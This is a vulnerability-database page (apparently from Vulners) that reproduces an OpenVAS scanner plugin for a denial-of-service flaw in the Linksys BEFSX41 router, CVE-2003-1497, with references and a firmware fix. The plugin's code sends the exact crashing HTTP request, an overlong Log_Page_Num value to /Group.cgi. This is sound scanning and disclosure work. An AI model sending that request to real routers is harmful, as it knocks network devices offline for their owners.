Lucene search
+L

LinkSys EtherFast Router Denial of Service Attack

🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2003 Matt NorthType 
openvas
 openvas
🔗 plugins.openvas.org👁 30 Views

LinkSys EtherFast Router DoS Attac

Related
Refs
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2003-1497
25 Oct 200719:00
cve
cvelist
Cvelist
CVE-2003-1497
25 Oct 200719:00
cvelist
euvd
EUVD
EUVD-2003-1487
7 Oct 202500:30
euvd
nessus
Tenable Nessus
Linksys BEFSX41 System Log Viewer Log_Page_Num Variable Overflow DoS
16 Oct 200300:00
nessus
nvd
NVD
CVE-2003-1497
31 Dec 200305:00
nvd
openvas
OpenVAS
LinkSys EtherFast Router Denial of Service Attack
3 Nov 200500:00
openvas
# SPDX-FileCopyrightText: 2003 Matt North
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.11891");
  script_version("2023-07-21T05:05:22+0000");
  script_tag(name:"last_modification", value:"2023-07-21 05:05:22 +0000 (Fri, 21 Jul 2023)");
  script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
  script_tag(name:"cvss_base", value:"6.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:S/C:N/I:N/A:C");
  script_cve_id("CVE-2003-1497");
  script_name("LinkSys EtherFast Router Denial of Service Attack");
  script_category(ACT_DENIAL);
  script_copyright("Copyright (C) 2003 Matt North");
  script_family("Denial of Service");
  script_dependencies("gb_get_http_banner.nasl");
  script_mandatory_keys("linksys/banner");

  script_xref(name:"URL", value:"http://www.digitalpranksters.com/advisories/linksys/LinksysBEFSX41DoSa.html");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/8834");
  script_xref(name:"URL", value:"http://www.linksys.com/download/firmware.asp?fwid=172");

  script_tag(name:"solution", value:"Update firmware to version 1.45.3.");

  script_tag(name:"summary", value:"The remote host seems to be a Linksys EtherFast Cable Firewall/Router.

  This product is vulnerable to a remote Denial of service attack : if logging
  is enabled, an attacker can specify a long URL which results in the router
  becoming unresponsive.");

  script_tag(name:"affected", value:"Linksys EtherFast Cable/DSL Firewall Router BEFSX41 (Firmware
  1.44.3) is known to be affected. Other versions or products might be affected as well.");

  script_tag(name:"qod_type", value:"remote_analysis");
  script_tag(name:"solution_type", value:"VendorFix");

  exit(0);
}

include("http_func.inc");
include("port_service_func.inc");

port = http_get_port(default:80);
if(http_is_dead(port:port)) exit(0);

banner = http_get_remote_headers(port:port);
if(! banner || "linksys" >!< banner) exit(0);

req = http_get(port: port, item: "/Group.cgi?Log_Page_Num=1111111111&LogClear=0");
http_send_recv(port: port, data: req);

alive = open_sock_tcp(port);
if (!alive) security_message(port:port);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jul 2023 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 26.3
EPSS0.01404
30